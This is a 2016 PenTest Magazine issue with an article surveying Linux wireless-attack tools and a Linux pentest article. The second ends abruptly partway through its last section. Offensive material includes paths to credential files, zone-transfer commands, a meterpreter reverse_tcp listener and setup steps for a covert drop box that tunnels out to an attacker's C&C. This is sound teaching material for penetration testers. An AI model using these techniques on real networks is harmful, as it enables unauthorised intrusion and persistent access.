
ISSN: 2084-1117 03/2016

Managing Editor: Anna Kondzierska 



anna.kondzierska@pentestmag.com

Proofreaders & Betatesters: Lee McKenzie, Kashif Aftab, Jeff Smith, Curtis Mechling, Irfan Akram, AYO
Tayo-Balogun, Avi Benchimol, Christopher Pedersen, Ali AYDIN, Daniela, Matthew Sabin, K S Abhiraj,
Ivan Gutierrez Agramont, Pierre-E Bouchard, Laney, Dave Bohm, Gilles L., Blake Shearer

Special thanks to the Betatesters & Proofreaders who helped with this issue. Without their assistance
there would not be a PenTest Magazine.

Senior Consultant/Publisher: Pawel Marciniak 


CEO: Joanna Kretowicz



joanna.kretowicz@pentestmag.com

DTP: Anna Kondzierska

Publisher: Hakin9 Media Sp. z o.o. SK
ul. Postepu 17D, 02-676 Warsaw, Poland
Phone: 1 917 338 3631
www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no
warranty, express or implied, concerning the results of content usage. All trade marks presented in the
magazine were used only for informative purposes.

All rights to trade marks presented in the magazine are reserved by the companies which own them.

DISCLAIMER!

The techniques described in our articles may only be used in private, local networks. The editors hold
no responsibility for misuse of the presented techniques or consequent data loss.

Contents

Wireless Penetration Testing Tools for Linux ............ 4
by Gerard Johansen

Linux Penetration Testing ............................... 13
by Mayur Agnihotri

Kali Linux Rubber Ducky ................................. 24
by Sam Vega

What is Hardening? And Why Do I Need It? ................ 36
by Junior Carreiro

Netcat - Hacking Backdoors .............................. 44
by Dhamu Harker

Cracking WPA2 via Pixie Dust Attack ..................... 50
by Jose Rodriguez

Linux Security - Best Practices ......................... 61
by Ragul Balakrishan

Weak Points of MDDoS Protection ......................... 66
by Tomasz Krupa

Dear PenTest Readers,
We would like to proudly present the newest issue of PenTest. We hope that you will find many
interesting articles inside the magazine and that you will have time to read all of them.

We are really counting on your feedback here!

In this issue we discuss tools and methods that you may find useful while doing penetration tests
on Linux systems. We will show you tools specifically for wireless assessments and show you how to
crack WPA/WPA2-PSK via the pixie dust attack. You will also find articles about looking for vulnerabilities
in cloud-based security providers' frameworks, using the USB Rubber Ducky with the Simple Ducky
Payload Generator, and many more.

The main aim of this issue is to present our publication to a wider range of readers. We want to share
the material we worked on, and we hope we can meet your expectations. With a free account you have
access to all the teasers and open issues, but we fully believe that you’d like to take this one step
further and enjoy our publications without limits. Our premium subscription includes access to our
whole archive.

The virtual doors to our library are open for you!

We’ve already started preparing the next issues of PenTest, which are going to be about writing an
effective penetration testing report and security audit methodologies. If there is a methodology you
would like to write about, or if you are a company that wants a professional product review, contact
us!

We would also like to thank you for all your support. We appreciate it a lot. If you like this
publication, you can share it and tell your friends about it! Every comment means a lot to us.

Again special thanks to the Beta testers and Proofreaders who helped with this issue. Without your
assistance there would not be a PenTest Magazine.

Enjoy your reading,


PenTest Magazine’s
Editorial Team
Wireless Penetration
Testing Tools for Linux
by Gerard Johansen

Wireless networks permeate all facets of how we interface with technology.


From accessing the internet at our favorite coffee shop, to countless conference
rooms in the business world, to our own homes, we are constantly interfacing
with wireless networks. Adding to this ubiquity is the rapidly approaching
Internet of Things. This explosion in wireless networking has made it easier for
people to communicate and control those devices that make everyday tasks
more efficient. Underneath this increased functionality are some glaring
vulnerabilities. Credentials passed in clear text, users connecting to a fake
access point, or brute force attacks that are able to identify the wireless
password all represent a significant risk.

Gaining insight into the risk, and possible vulnerabilities, in wireless networks is critical to ensuring
that the information we pass through these radio signals is not compromised.
To this aim, there are countless tools available for the security professional to assess wireless networks
and take the appropriate steps to secure them. Some of the most common and useful of these can be
utilized within the Linux operating system.

Adding tools specifically for wireless assessments and penetration testing to a chosen Linux OS has
several advantages. First, many of the tools will not function on other operating systems due to
hardware or software compatibility issues. Second, the Linux OS, due to its open nature, allows for
greater customization of how tools interact. Finally, the majority of these tools are written for the Linux
OS and function best on that platform. All of the following tools can be run on most flavors of Linux;
additionally, these tools are all open source.

Gear
Before we discuss some of the common tools for wireless assessment and penetration testing, there
are some back-end tools that are needed. The first is an external antenna. This is handy to have, as
most internal wireless cards will not allow you to utilize these tools to their fullest extent. Also,
if you are running a virtual machine, a USB antenna will save you the trouble of attempting to configure
a wireless connection through the host OS.

For external antennas, there are several options. When selecting an antenna, it is recommended that
you use one that makes use of either the Ralink RT3070 or Atheros AR9271 chipset. These chipsets
are reliable and allow for the full use of the tools that will be discussed. They can easily be found in
antennas priced from $15 USD for a TP-Link antenna to a little more than $30 USD for an Alfa USB
wireless antenna. Some of these even allow for different types of antennas that will increase the range
of your toolset.

Below is the author’s TP-Link antenna that utilizes the Atheros AR9271 chipset:

Command line tools


The first set of tools that are useful for wireless assessment and penetration testing are those that run
from a command line. Those familiar with the Kali Linux OS may recognize some of these tools as part
of that package. The main advantage of these tools is their relative ease of use and the ability to apply
them to the specific type of assessment or test being conducted.

The first of these tools is Aircrack-ng. (Available at www.aircrack-ng.org/).


This suite of command line tools is specifically crafted for conducting wireless security assessments
and penetration testing. The variety of components within the suite allows for the wide range of actions
that testers will encounter when testing wireless networks. In short, the tool set allows for:

− Capturing packets from target networks. Attacks such as brute forcing the Pre-Shared Key for
WPA/WPA2 networks and brute forcing the WEP key require the tester to capture traffic to, and
from, the wireless access point undergoing testing. The Airodump-ng feature of Aircrack-ng
allows this communication to be captured and saved for further offline analysis.
− Once you have captured the key exchange, Aircrack-ng allows for the offline brute forcing of
WEP/WPA/WPA2-PSKs.
− Packet captures between the access point and a client can be decrypted if a valid four-way
handshake has been captured. The Airdecap-ng tool allows for the decryption of the packets and
allows testers to conduct packet analysis looking for confidential information such as plain text
credentials.

− Finally, if the assessment includes looking at clients as opposed to cracking the access point,
the tool airbase-ng allows for setting up fake access points to conduct the Evil-AP attack and
to utilize Man in the Middle techniques to obtain sensitive information from the client.

The tools in the Aircrack-ng suite can be considered a Swiss Army knife of sorts. There are a great
many tools and features in the suite. While it may seem daunting, working at the command line with
this tool set pays off when GUI tools are used later, because many of them are currently built on the
Aircrack-ng suite.

Another excellent tool for cracking WPA-PSKs is coWPAtty. This tool takes a wireless traffic capture
and attempts to ascertain the Pre-Shared Key. It makes use of a dictionary file, trying each entry
in turn.

The drawback to using coWPAtty is the speed with which this takes place. Due to this, the tool
should be utilized against suspected weak passwords. (Available at
https://sourceforge.net/projects/cowpatty/).
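The mechanics coWPAtty automates can be sketched in a few lines of Python. WPA/WPA2 derives the Pairwise Master Key from the passphrase with PBKDF2-HMAC-SHA1 (4,096 iterations, SSID as salt), which is exactly why dictionary attacks against it are slow. This sketch uses the published IEEE 802.11i test vector (passphrase "password", SSID "IEEE") rather than anything from a real capture, and the function names are my own:

```python
import hashlib

def wpa_psk(passphrase: str, ssid: str) -> bytes:
    # WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def dictionary_attack(target_pmk: bytes, ssid: str, wordlist):
    # The slow part coWPAtty automates: derive a candidate key per word and compare
    for word in wordlist:
        if wpa_psk(word, ssid) == target_pmk:
            return word
    return None

# IEEE 802.11i test vector: wpa_psk("password", "IEEE").hex() starts with "f42c6fc5..."
```

Because each candidate costs 4,096 HMAC rounds, commodity hardware only manages on the order of thousands of passphrases per second, which is why the article recommends aiming the tool at suspected weak passwords.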

Finally, a good tool to add to the wireless assessment and penetration testing toolbox is pixiewps.
This tool leverages the flaw found by Dominique Bongard in the Wi-Fi Protected Setup (WPS) in use by
access points and wireless clients. Pixiewps can be utilized to conduct a brute force attack against
the WPS pin in what is known as a "pixie dust attack". With the widespread use of WPS at the
consumer level, it is a good idea to investigate this type of attack. (Available at
https://github.com/wiire/pixiewps).
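For context on why the WPS pin is such an attractive target: the pin is eight digits, but the last digit is a checksum of the first seven, and the protocol confirms the two halves separately, shrinking the effective search space to roughly 11,000 guesses (pixie dust goes further still, recovering the pin offline from weak nonces). A sketch of the checksum as defined in the WPS specification; the function names are my own:

```python
def wps_checksum(pin7: int) -> int:
    # WPS checksum over the first 7 digits: alternating weights 3 and 1,
    # starting from the least significant digit
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10

def full_pin(pin7: int) -> str:
    # Append the checksum digit to produce a valid 8-digit WPS PIN
    return f"{pin7:07d}{wps_checksum(pin7)}"
```

For example, full_pin(1234567) yields the well-known valid test PIN "12345670".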


Interactive Tools
The next type of tools that are useful are interactive. These do not have a GUI, but do automate some
tasks and often rely on user input to proceed with actions. These tools are also useful for assessing the
security of wireless networks without necessarily carrying out a full-on penetration test.

The first of these is Kismet. Kismet allows the user to identify wireless networks within range
of the antenna. Paired with the external antennas discussed before, this allows the assessor to identify
more wireless networks and potential Evil APs. Kismet also has the ability to sniff wireless traffic for
offline analysis. Finally, there is a wireless intrusion detection capability built in. (Available at
http://kismetwireless.net/download.shtml).

A second handy tool is Wifite. Wifite is an easy to use wireless penetration testing tool that wraps the
tool set found in the Aircrack-ng suite in a Python script.

Wifite can scan for wireless networks, conduct attacks against WEP/WPA/WPA2 and WPS. Upon
starting Wifite, the user will be shown the wireless access points in range.

The user then has to select a network to attack by entering in the number associated with the access
point under assessment.

Wifite is a fantastic tool if there are time constraints for the assessment or penetration test and the
tester needs to set up something fast. A penetration tester can find the target access point and then
simply conduct a wide range of attacks against it. Wifite also allows for multiple APs to be attacked
simultaneously. This is really handy if the tester has a number of wireless networks to test. (Available
at https://github.com/derv82/wifite).

The designers who came up with WAIDPS call it a Swiss army knife; it is more like a multi-tool to rule
them all. WAIDPS (Wireless Auditing and IDS/IPS) is a Python script designed for the Linux
environment.

In short, WAIDPS has several features that are very important to those conducting wireless
assessments and penetration tests:
- The aggregation of data about wireless access points and clients within range of the antenna.
- The automatic capture and saving of wireless packets to a file which allows the assessor to go
back and perform offline packet inspection.

In addition to penetration testing, there are a number of tools and IDS/IPS features that identify
potential attacks. These include ARP request replay attacks, WPS attacks using tools such as Reaver,
and detection of fake APs. Due to the ease of installation, WAIDPS is easily deployed on any Linux
system to monitor the security of wireless systems. (Available at
https://n0where.net/waidps-wireless-auditing-ipsids/).

WAIDPS has advantages for those who are undergoing the assessment as well. A WAIDPS instance can
be configured on the network under attack. Then a Red on Blue exercise can be run, where the Red
team attempts to gain access to the wireless network while the Blue team attempts to locate the
attack attempts using the WAIDPS instance. This way, the assessor or penetration tester can verify
whether the client has the ability to observe the attack and stop it.

GUI Based Tools


Several tools that utilize a GUI are based upon the Aircrack-ng suite. Besides the obvious advantage
of using a GUI when presenting findings to non-technical decision makers, having a GUI really helps in
those complex assessments and penetration tests. One tool that takes the toolset from Aircrack-ng and
places it into an easy to use interface is Gerix Wifi Cracker. (Available at
https://github.com/TigerSecurity/gerix-wifi-cracker).

Gerix Wifi Cracker allows the user to configure a number of different attacks against wireless networks.
These include cracking WEP/WPA/WPA2, as well as setting up Evil AP attacks. One feature that is very
useful in the suite is the cracking feature. This allows the user to conduct a brute force attack
against the WEP/WPA/WPA2 key utilizing pre-configured rainbow tables, as well as using coWPAtty
alongside it. While this will increase the amount of time necessary to conduct the test, it will be a more
thorough measure of the strength of the key.

Other Helpful Tools
In addition to the tools necessary for interacting with and assessing wireless access points, some other
tools can assist the assessor or penetration tester. First is Ettercap. Ettercap has a sniffing tool that
allows penetration testers to capture network traffic for offline analysis. Part of that tool scans the
network for hosts, which aids another important feature of Ettercap: conducting Man in the Middle
(MitM) attacks against hosts on the wireless network. (Available at
https://ettercap.github.io/ettercap/).

Finally, two tools that are critical to any assessment, and specifically to wireless assessments, are
TCPDump and Wireshark. TCPDump is a mainstay of the Linux OS. This command line tool can be
utilized to capture packets traversing an interface and save them for further examination. Wireshark
can read TCPDump packet capture files, but can also be utilized as a packet capture tool in and of
itself. Inspecting packets from a wireless network will give the assessor, or penetration tester,
a clear idea of whether confidential information, or credentials, are being passed from a client to the
access point.

Wireless networks will continue to permeate the technology landscape due to their ease of use and
because they significantly reduce the cost of implementation. Assessors and penetration testers
should take every step to ensure that these networks are continually assessed. The tools outlined are
just a sample of the myriad of tools available for the Linux OS. Gaining a solid foundation in
these tools will allow the assessor, or penetration tester, to conduct a full spectrum attack against
wireless networks and identify vulnerabilities or configuration errors that could be leveraged by
attackers to gain access to confidential information.

Author: Gerard Johansen


Gerard Johansen is an information security professional
based out of North America. He currently specializes in
penetration testing and incident response. He has worked as
a consultant, security analyst and cyber crime investigator.
Gerard is a frequent speaker on security topics and stays
involved with community groups that center on penetration
testing and security issues.

Linux Penetration
Testing
by Mayur Agnihotri

The Internet has become fraught with danger in the last few years: bad guys
(cyber-criminals) try to damage, intercept, steal, or alter your data. Linux is
popular because it is a robust OS with many advanced security features, and it
is the preferred OS for those who demand secure networks; however, because
Linux is open source, vulnerabilities can be easily exploited for malicious
intent.

If you run a Linux host on the Internet, however, you may hold a different point
of view. A good first step is to check what services are currently running on
your system.

As we know, /etc/inetd.conf is the default configuration file for the inetd (super-server) daemon, and
it makes system administration work less complex. This file describes the many services that are
handled through inetd; for maximum security, any of them that are not needed should be turned off!
• To check what services are currently running on your Linux system, use the command: netstat

By default, netstat displays a list of open sockets.

The first and most simple command is to list all the current connections. Simply run the netstat
command with the “a” option.

1. netstat -a

This shows all connections from different protocols like tcp, udp, and unix sockets.

For a list of only tcp connections, use the “a” and “t” option like this:

2. netstat -at

Similarly, to list out only udp connections use the “a” and “u” option like this:

3. netstat -au

Here, I covered only the basic and most common commands; many more options are available in the
netstat command.
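On Linux, netstat builds its output from files such as /proc/net/tcp, where each socket's address appears as a hex value in host byte order. A small sketch of the decoding (assumes a little-endian machine such as x86; the function name is my own):

```python
import socket
import struct

def decode_addr(hex_addr: str):
    # /proc/net/tcp stores "IP:port" as hex, e.g. "0100007F:0016";
    # the IP is a 32-bit value in host (little-endian on x86) byte order
    ip_hex, port_hex = hex_addr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)
```

For example, decode_addr("0100007F:0016") returns ("127.0.0.1", 22), i.e. a socket bound to localhost port 22 — the same information netstat presents in readable form.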

How to Detect Rootkits Under Linux


1. Zeppoo - Zeppoo allows you to detect rootkits on i386 and x86_64 architectures under Linux by
using /dev/kmem and /dev/mem. Moreover, it can also detect hidden tasks, connections,
corrupted symbols, system calls and many other things.

2. The Rootkit Hunter Project: rkhunter (Rootkit Hunter) is a Unix-based tool that scans for rootkits,
backdoors, and possible local exploits.

To run Rootkit Hunter please install or upgrade to Rootkit Hunter version 1.4.2 and read the README.
• If you have questions about what Rootkit Hunter reports, or if you encounter runtime or
configuration problems, please first consult the Rootkit Hunter installation tutorial (if applicable),
the Rootkit Hunter FAQ and the rkhunter-users mailing list archives.
• If your question is not answered in the FAQ or the mailing list archives, please join (subscribe to)
the rkhunter-users mailing list and ask.
• If you would like to be kept informed of updates, we also have a (very) low volume rkhunter-
announce mailing list.
• If you would like to report a bug, downstream (package maintainer) changes or supply a patch:
please use the Rootkit Hunter bug tracker. If unsure please first check on the rkhunter-users
mailing list.
• rkhunter Project Home Page

Chkrootkit - chkrootkit is a tool to locally check for signs of a rootkit. It contains:


• chkrootkit: shell script that checks system binaries for rootkit modification.

• ifpromisc.c: checks if the interface is in promiscuous mode.

• chklastlog.c: checks for lastlog deletions.

• chkwtmp.c: checks for wtmp deletions.

• check_wtmpx.c: checks for wtmpx deletions. (Solaris only)

• chkproc.c: checks for signs of LKM trojans.

• chkdirs.c: checks for signs of LKM trojans.

• strings.c: quick and dirty strings replacement.

• chkutmp.c: checks for utmp deletions.

• chkrootkit Project Home Page

Some Linux Network Commands
COMMAND                                  DESCRIPTION
netstat -tulpn                           Show Linux network ports with process IDs (PIDs).
watch ss -stplu                          Watch TCP, UDP open ports in real time with socket summary.
lsof -i                                  Show established connections.
macchanger -m MACADDR INTR               Change MAC address on Kali Linux.
ifconfig eth0 192.168.2.1/24             Set IP address in Linux.
ifconfig eth0:1 192.168.2.3/24           Add IP address to existing network interface in Linux.
ifconfig eth0 hw ether MACADDR           Change MAC address in Linux using ifconfig.
dig -x x.x.x.x                           Reverse lookup on an IP address using dig.
host x.x.x.x                             Reverse lookup on an IP address, in case dig is not installed.
dig @192.168.2.2 domain.com -t AXFR      Perform a DNS zone transfer using dig.
host -l domain.com nameserver            Perform a DNS zone transfer using host.
nbtstat -A x.x.x.x                       Get hostname for IP address.
ip addr add x.x.x.x/24 dev eth0          Add an IP address to Linux that does not show up when
                                         performing an ifconfig.
tcpkill -9 host abc.com                  Kill TCP connections to/from abc.com on the host machine.

Some Interesting Linux Files / Directories


DIRECTORY                DESCRIPTION
/etc/passwd              Contains local Linux users.
/etc/shadow              Contains local account password hashes.
/etc/group               Contains local account groups.
/etc/init.d/             Contains service init scripts - worth a look to see what's installed.
/etc/hostname            System hostname.
/etc/network/interfaces  Network interfaces.
/etc/resolv.conf         System DNS servers.
/etc/profile             System environment variables.
~/.ssh/                  SSH keys.
~/.bash_history          User's bash history log.
/var/log/                Linux system log files are typically stored here.
/var/adm/                UNIX system log files are typically stored here.

The /var/log directory contains variable data such as system logging files, mail and printer spool
directories, and transient and temporary files. The main problem with log files (logging events) is too
much data, so we need to filter the data carefully. For logging/intrusion detection, I think Tripwire is
a cool tool because it takes a snapshot of your important system files and records their signatures in
a database. You can also set rules in a policy file to tell Tripwire what to check.
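Tripwire's core idea can be sketched in a few lines: hash the watched files once to build a baseline, then re-hash later and report mismatches. This is only an illustration of the concept, not Tripwire's actual database or policy format:

```python
import hashlib

def snapshot(paths):
    # Record a SHA-256 digest for each watched file (the "baseline database")
    digests = {}
    for p in paths:
        with open(p, "rb") as f:
            digests[p] = hashlib.sha256(f.read()).hexdigest()
    return digests

def changed(baseline, paths):
    # Re-scan and report every file whose digest no longer matches the baseline
    current = snapshot(paths)
    return [p for p in paths if current[p] != baseline.get(p)]
```

Real tools also track permissions, ownership, and timestamps, and protect the baseline itself from tampering; the digest comparison is just the heart of the technique.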

Snort is another popular program for detecting access attempts. In conclusion, I must say the system
administrator should review all the log files on a regular basis.
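As an example of the filtering mentioned above, the sketch below counts failed SSH logins per source IP from auth.log-style lines. The exact sshd message format is an assumption, and real log review should of course cover far more than this one pattern:

```python
import re
from collections import Counter

# sshd-style "Failed password" lines; the exact field layout is an assumption
FAILED = re.compile(r"Failed password for (?:invalid user )?\S+ from (\S+)")

def failed_logins(lines):
    # Count failed SSH login attempts per source IP address
    return Counter(m.group(1) for line in lines if (m := FAILED.search(line)))
```

Run against /var/log/auth.log, a result like {"203.0.113.5": 5000} immediately surfaces a brute force attempt that would be invisible in thousands of raw log lines.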

Script for Automating Linux Memory Capture and Analysis
To analyze Linux memory, you first need to be able to capture Linux memory. Joe Sylve's Linux Memory
Extractor (LiME) is excellent for this, but you need to have a LiME module compiled for the kernel of
the system where you want to grab the RAM.

Volatility(TM) is great at analyzing Linux memory images. But it needs a profile that matches the system
where the memory was captured. Building a profile means compiling a C program on the appropriate
system and using dwarfdump to get the addresses of important kernel data structures. You also need a
copy of the System.map file from the /boot directory.

Now if you happen to have a duplicate of your target system, you can build LiME and compile the
Volatility(TM) profile on the clone, and use them to capture and analyze memory from your target. But
there are many situations where a duplicate of your target system is not available, so you may have to
compile LiME and build your Volatility(TM) profile on the target machine itself. This is not for the faint
of heart: there are a number of steps, and some fairly low-level Linux commands involved. My goal was
to create a package that could be installed (by an expert) on a thumb drive and distributed to agents in
the field. The user of the thumb drive should be able to plug the thumb drive in, run a single
command, and successfully acquire a memory image of the target machine and a working Volatility(TM)
profile. The result is my lmg (Linux Memory Grabber) script.
ON FORENSIC PURITY

==================
If you are a stickler for forensic purity, this is probably not the tool for you. Let us discuss some of the
ways in which my tool interacts with the target system: 

Removable Media -- The tool is designed to be run from a portable USB device such as a thumb drive.
You are going to be plugging a writable device into your target system, where it could potentially be
targeted by malicious users or malware on the system. The act of plugging the device into the system
is going to change the state of the machine (e.g., create log entries, mtab entries, etc.). If the device
is not auto-mounted by the operating system, the user must manually mount the device via a root shell.

Compilation -- lmg builds a LiME kernel module for the system. Creating a Volatility(TM) profile also
involves compiling code on the target machine, so gcc will be executed, header files read, libraries
linked, etc. lmg tries to minimize impact on the file system of the target machine by setting TMPDIR
to a directory on the USB device that lmg runs from. This means that intermediate files created by the
compiler will be written to the thumb drive, rather than the local file system of the target machine.
Dependencies -- In order to compile kernel code on Linux, the target machine needs a working
development environment with gcc, make, etc., and all of the appropriate include files and shared
libraries. In particular, the kernel header files need to be present on the local machine. These
dependencies may not exist on the target. In this case, the user is faced with the choice of installing
the appropriate dependencies (if possible) or being unable to acquire memory from the target.
Malware -- lmg uses /bin/bash, gcc, zip, and a host of other programs from the target machine. If the
system has been compromised, the applications lmg relies on may not be trustworthy. A more complete
solution would be to create a secure execution environment for lmg on the portable USB device;
however, this was beyond the scope of this initial proof of concept.
Memory -- All of the commands being run will cause the memory of the target system to change. The
act of capturing RAM will always create artifacts, but in this case there is extensive compilation, file
system access, etc. in addition to running a RAM dumper.
All of that being said, lmg is a very convenient tool for allowing less-skilled agents to capture useful
memory analysis data from target systems. Note that lmg will look for an already existing LiME module
on the USB device that matches the kernel version and processor architecture of the target machine. If
found, lmg will not bother to recompile. Similarly, you may choose to not have lmg create the
Volatility(TM) profile for the target in order to minimize the impact on the target system.
lmg uses relative path names when invoking programs like gcc and zip. So if you wish to run these
programs from alternate media, simply update $PATH as appropriate before running lmg.
USING LMG

=========
First, prepare a thumb drive according to the instructions in the INSTALL document provided with lmg.
When you wish to acquire RAM, plug the thumb drive into your target system. On most Linux systems,
new USB devices will get automatically mounted under /media. Let us assume yours ends up under
/media/LMG. Now, as root, run "/media/LMG/lmg". This is the interactive mode, and the user will be
prompted for confirmation before lmg builds a LiME module for the system and/or creates a
Volatility(TM) profile. If you do not want to be prompted, use "/media/LMG/lmg -y". Everything else is
automated. After the script runs, you will have a new directory on the thumb drive named
".../capture/<hostname>-YYYY-MM-DD_hh.mm.ss". lmg supports a -c option for specifying a case ID
directory name to be used instead of the default "<hostname>-YYYY-MM-DD_hh.mm.ss" directory.
Whatever directory name is used, the directory will contain:

<hostname>-YYYY-MM-DD_hh.mm.ss-memory.lime -- the RAM capture

<hostname>-YYYY-MM-DD_hh.mm.ss-profile.zip -- Volatility(TM) profile

<hostname>-YYYY-MM-DD_hh.mm.ss-bash -- copy of target's /bin/bash

volatilityrc -- prototype Volatility config file

The volatilityrc file defines the appropriate locations for the captured memory and plugin. See the
USAGE EXAMPLE below for how to use this file.

The copy of /bin/bash is helpful for determining the address of the shell history data structure in the
memory of bash processes in the memory capture.

See: http://code.google.com/p/volatility/wiki/LinuxCommandReference23#linux_bash

for further details on how to use this executable (or reference the USAGE EXAMPLE below).
Note that there may be times when you do not wish to write data to the media that you are running lmg
from -- for example, if the lmg tools are on read-only media like a DVD-ROM. lmg supports a -d option
to specify a different output directory. By default, all compilation will happen in the target directory, but
the user may specify an alternate compilation directory with -B.
For more detail, visit Hal Pomeranz's site.

Awesome Linux Penetration Testing Tools: Vezir-Project, Discover, ssh-phone-home.

Vezir-Project 
Yet another Linux virtual machine for mobile application pentesting and mobile malware analysis.
The main purpose of Vezir is to provide an up-to-date testing environment for mobile security
researchers. Vezir (vizier, the chess queen in Turkish) is based on Ubuntu and was created with
VMWare Fusion 6.0.4. In order to minimize compatibility issues, the Vezir virtual machine is set to use
hardware version 8 and is therefore compatible with:
• ESXi 5.0
• ESXi 5.1
• Fusion 4.0
• Fusion 5.0
• Fusion 6.0
• Workstation 8.0
• Workstation 9.0
• Workstation 10.0
Vezir 2.0 uses the XFCE desktop environment (Xubuntu) and is based on Ubuntu 15.04.

Update status:
• Vezir 2.0: latest version is Vezir 2.0.2, updated on 3 Dec 2015
• Vezir 1.0: last updated on 3 Oct 2015

Download:
• Download Vezir 2.0.2 from the link: https://goo.gl/LfPJkW
• Download Vezir 1.0 (older release) from the link: https://goo.gl/yuieQf

Credentials:
• Username: vezir Password: vezir

Tools:
• Eclipse
• Android Studio
• Android SDK
•  (Intentionally removed in Vezir 2.0)
• libimobiledevice library
• BinaryCookieReader
• androguard
• Drozer
• JD-GUI

• Jadx
• dex2jar
• Hopper
• (Intentionally removed in Vezir 2.0)
• plutil
• baksmali
• apktool
• sqlmap
• BurpSuite Free
• Wireshark
• sqlite3
• sqlitebrowser
• AXMLPrinter2
• Graphviz Dot
• Doxygen
• Android Log Viewer
• Simplify Deobfuscator
• Genymotion
• Virtualbox
• MFFA (Media Fuzzing Framework for Android)
• Vulnerable Labs (SecurityCompass InsecureBank, OWASP GoatDroid, Pentesterlab SQLi)
• Enjarify
• Apache HTTP server
• BytecodeViewer - planned for future release (https://github.com/Konloch/bytecode-viewer)
All the tools above are put in the /home/vezir/ambar directory. Most of them are added to PATH, so you
can easily run them by just typing the name of the application.
Source:  Vezir-Project 

Discover
For use with Kali Linux. Custom bash scripts used to automate various pentesting tasks.
Download, setup & usage
git clone https://github.com/leebaird/discover /opt/discover/
All scripts must be run from this location.
cd /opt/discover/
./update.sh
RECON

1. Domain

2. Person

3. Parse salesforce
SCANNING

4. Generate target list

5. CIDR

6. List

7. IP or domain

WEB

8. Open multiple tabs in Iceweasel

9. Nikto

10. SSL
MISC

11. Crack WiFi

12. Parse XML

13. Start a Metasploit listener

14. Update

15. Exit
RECON
Domain
RECON
1. Passive

2. Active

3. Previous menu
Passive combines goofile, goog-mail, goohost, theHarvester, Metasploit, dnsrecon, URLCrazy, Whois,
and multiple websites.
Active combines Nmap, dnsrecon, Fierce, lbd, WAF00W, traceroute and Whatweb.

Person
RECON
First name:

Last name:
Combines info from multiple websites.
Parse salesforce

Create a free account at salesforce (https://connect.data.com/login).
Perform a search on your target company > select the company name > see all.

Copy the results into a new file.
Enter the location of your list:
Gather names and positions into a clean list.
SCANNING
Generate target list
SCANNING
1. Local area network

2. NetBIOS

3. netdiscover

4. Ping sweep

5. Previous menu
Use different tools to create a target list including Angry IP Scanner, arp-scan, netdiscover, and nmap
pingsweep.
CIDR, List, IP or Domain
Type of scan:
1. External

2. Internal

3. Previous menu
External scan will set the nmap source port to 53 and the max-rtt-timeout to 1500ms.

Internal scan will set the nmap source port to 88 and the max-rtt-timeout to 500ms.
Nmap is used to perform host discovery, port scanning, service enumeration, and OS identification.
Matching nmap scripts are used for additional enumeration.
Matching Metasploit auxiliary modules are also leveraged.
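The external scan profile described above corresponds roughly to an nmap invocation like the following (a sketch only; the target address and the exact option set are illustrative, not taken from the Discover source):

```shell
# External-style scan: source port 53 (DNS), RTT timeout capped at 1500ms,
# with service enumeration (-sV) and OS identification (-O)
nmap -g 53 --max-rtt-timeout 1500ms -sV -O 203.0.113.10
```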
WEB
Open multiple tabs in Iceweasel
Open multiple tabs in Iceweasel with:
1. List

2. Directories from a domain's robots.txt.

3. Previous menu
Use a list containing IPs and/or URLs.
Use wget to pull a domain's robots.txt file, then open all of the directories.
Nikto
Run multiple instances of Nikto in parallel.
1. List of IPs.

2. List of IP:port.

3. Previous menu

SSL
Check for SSL certificate issues.
Enter the location of your list:
Use sslscan and sslyze to check for SSL/TLS certificate issues.
MISC
Crack WiFi
Crack wireless networks.
Parse XML
Parse XML to CSV.
1. Burp (Base64)

2. Nessus

3. Nexpose

4. Nmap

5. Qualys

6. Previous menu
Start a Metasploit listener
Setup a multi/handler with a windows/meterpreter/reverse_tcp payload on port 443.
Update
Use to update Kali Linux, Discover scripts, various tools, and the locate database.
Source: Discover

ssh-phone-home
This project was created in order to quickly create Kali Linux based drop boxes built on inexpensive
hardware such as a Raspberry Pi, to be plugged into a target network during a physical penetration
test.
Anything that runs Kali should work with these scripts just fine.
Description

These scripts setup one Kali machine (the drop box) to phone home to another Kali machine (the C&C)
over SSH on port 443. Port 2222 on the C&C is then forwarded to port 22 on the drop box, allowing
you to SSH into the drop box through the reverse tunnel and wreak havoc on... er... pentest the target
network. =P
By default, the drop box will attempt an outgoing SSH connection to port 443 every 5 minutes.
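A phone-home like this is commonly implemented as a scheduled reverse SSH tunnel. A minimal sketch of the idea (illustrative only; the actual setup scripts may differ, and the cron approach, key path, and variable are assumptions):

```shell
# Cron entry (e.g. in /etc/crontab): every 5 minutes, connect out to the
# C&C on port 443 and open a reverse tunnel so the C&C's port 2222
# forwards back to the drop box's SSH on port 22.
*/5 * * * * root ssh -i /opt/ssh-phone-home/id_rsa -p 443 -N \
    -R 2222:localhost:22 dropbox@$CNC_IP
```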
Install Instructions
Install Kali on your main computer (C&C), and your drop box (the one you will leave plugged in to the
target network). As always, be sure to change the root password on both machines so that it is not the
default.
All scripts should be run as root on both machines.
Download the necessary files to each machine (both the drop box and C&C).

cd /opt

git clone https://github.com/Wh1t3Rh1n0/ssh-phone-home
Modify /opt/ssh-phone-home/phone-home.sh to point to your C&C's IP/hostname.
Example:
CNC_IP=8.8.8.8
Setup the drop box by running the setup script on that machine:
bash /opt/ssh-phone-home/setup-drop-box.sh

 
Copy the drop box's public SSH key to /opt/ssh-phone-home/id_rsa.pub on the C&C. 
scp /opt/ssh-phone-home/id_rsa.pub root@[CNC-IP]:/opt/ssh-phone-home/
Setup the C&C server by running the C&C setup script on that machine:
bash /opt/ssh-phone-home/setup-cnc.sh
This script will make the following changes to your C&C machine:
Create the non-root user "dropbox", which the drop box will connect as.
Import drop box's public SSH key for SSH login without a password.
Configure SSH to run on port 443 as well as the default port 22.
C&C Command Reference
These commands come in handy after you have everything set up and are working from the C&C server.
Start the SSH service:
service ssh start
Enable SSH service start at boot:
update-rc.d ssh enable
Check for current drop box connections:
netstat -antp | grep ":443.\+ESTABLISHED.\+/sshd"
Watch for incoming drop box connections:
watch 'netstat -antp | grep ":443.\+ESTABLISHED.\+/sshd"'
Close the connection from a drop box.
